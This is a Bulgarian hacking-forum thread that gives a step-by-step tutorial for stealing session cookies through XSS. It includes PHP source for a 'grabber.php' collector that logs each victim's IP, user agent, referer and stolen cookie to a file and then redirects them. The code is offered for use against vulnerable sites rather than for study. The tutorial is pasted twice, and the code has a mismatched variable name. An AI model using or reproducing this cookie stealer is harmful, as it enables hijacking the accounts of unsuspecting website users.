Как се взимат cookies чрез XSS?!
2 posters
2GOOD4U :: ОТДЕЛ "ЧИСТОТА" :: Архив :: Стари теми :: HACK FORUM BG :: Hack Forum :: Tutorials
Страница 1 от 1
Как се взимат cookies чрез XSS?!
Здравейте отново! В преден урок бях убяснил какво е XSS:
Cross-site
scripting (XSS) е вид уязвимост в компютърната сигурност която се
намира в уеб приложенията. Тя позволява на атакуващия сървара да
използва зловреден код. Този код може да се ползва за много неща като
примерно взимане на сесий или bypass на контролирана страница (priv8).
За придобиване на достъп в сайт който има допусната уязвимост XSS ще Ви е нужно да имате 2 неща:
1. Сайт който е уязвим към XSS!
2. Поддържащ php хостинг [You must be registered and logged in to see this image.]
Сега се регистрирайте в някой хостинг! След като влезнете в File Manager-a направете един php файл с име по Ваша преценка! [You must be registered and logged in to see this image.]
cookie.php
Код:
Cookie Stealer
COOKIES STEALTHER
by Scr!pt3r XSSecurity Crew
Този файл cookie.php се използва за да виждаме откраднатите cookies.
Сега създаваме още един php файл който ще краде самите cookies:
grabber.php
Код: [You must be registered and logged in to see this link.]$ip = $_SERVER['REMOTE_ADDR'];
$refferer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET[c];
$time = date("Y-m-d G:i:s A");
$text
= "
".$time." = ".$ip."
User
Agent: ".$agent."
Referer: ".$referer."
Session:
".$data."
";
$file = fopen('log.php' , 'a');
fwrite($file,$text);
fclose($file);
header("Location: [You must be registered and logged in to see this link.]
?>
Този код ще взима информация за жертвата!
След пренасочването към [You must be registered and logged in to see this link.] ще се запишат cookies за този сайт!
Cross-site
scripting (XSS) е вид уязвимост в компютърната сигурност която се
намира в уеб приложенията. Тя позволява на атакуващия сървара да
използва зловреден код. Този код може да се ползва за много неща като
примерно взимане на сесий или bypass на контролирана страница (priv8).
За придобиване на достъп в сайт който има допусната уязвимост XSS ще Ви е нужно да имате 2 неща:
1. Сайт който е уязвим към XSS!
2. Поддържащ php хостинг [You must be registered and logged in to see this image.]
Сега се регистрирайте в някой хостинг! След като влезнете в File Manager-a направете един php файл с име по Ваша преценка! [You must be registered and logged in to see this image.]
cookie.php
Код:
Cookie Stealer COOKIES STEALTHER
by Scr!pt3r XSSecurity Crew
Cookie Stealer
COOKIES STEALTHER
by Scr!pt3r XSSecurity Crew
Този файл cookie.php се използва за да виждаме откраднатите cookies.
Сега създаваме още един php файл който ще краде самите cookies:
grabber.php
Код: [You must be registered and logged in to see this link.]$ip = $_SERVER['REMOTE_ADDR'];
$refferer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET[c];
$time = date("Y-m-d G:i:s A");
$text
= "
".$time." = ".$ip."
User
Agent: ".$agent."
Referer: ".$referer."
Session:
".$data."
";
$file = fopen('log.php' , 'a');
fwrite($file,$text);
fclose($file);
header("Location: [You must be registered and logged in to see this link.]
?>
Този код ще взима информация за жертвата!
След пренасочването към [You must be registered and logged in to see this link.] ще се запишат cookies за този сайт!
hARDCORE- Power user
- Zodiac : Брой мнения : 297
Отсенка : 1337
Rep : 10
Регистриран на : 13.01.2010
Age : 27
Местожителство : PLOVDIV
точки
точки:
(652/1000)
Re: Как се взимат cookies чрез XSS?!
Много известен съм станал! пиши ми в скайп script3r_xssecurity
Scr!pt3r- Статист
- Брой мнения : 2
Отсенка : 2
Rep : 0
Регистриран на : 04.05.2011
2GOOD4U :: ОТДЕЛ "ЧИСТОТА" :: Архив :: Стари теми :: HACK FORUM BG :: Hack Forum :: Tutorials
Страница 1 от 1
Права за този форум:
Не Можете да отговаряте на темите
|
|